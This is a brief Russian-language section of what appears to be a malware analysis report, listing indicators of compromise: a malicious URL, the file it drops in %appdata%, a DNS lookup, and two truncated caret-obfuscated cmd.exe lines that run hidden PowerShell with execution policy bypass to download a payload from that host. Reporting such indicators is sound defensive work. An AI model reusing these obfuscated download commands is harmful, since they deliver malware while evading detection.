Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OwE^RsHE^ll.^E^X^e ^-^E^XE^c^utiO^N^PoL^Icy Byp^A^SS -NOProFiLE ^-wi^NDO^WS^TYLE^ ^h^iDdEn^ (^NEw^-OBJ^EcT^ ^sysTeM.NET^.^weBc^l^ienT).^DOw^nloA^D^filE(^'http://transporingsytw...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /C "P^OwE^RsHE^ll.^E^X^e ^-^E^XE^c^utiO^N^PoL^Icy Byp^A^SS -NOProFiLE ^-wi^NDO^WS^TYLE^ ^h^iDdEn^ (^NEw^-OBJ^EcT^ ^sysTeM.NET^.^weBc^l^ienT).^DOw^nloA^D^filE(^'http://transporingsytw...' (со скрытым окном)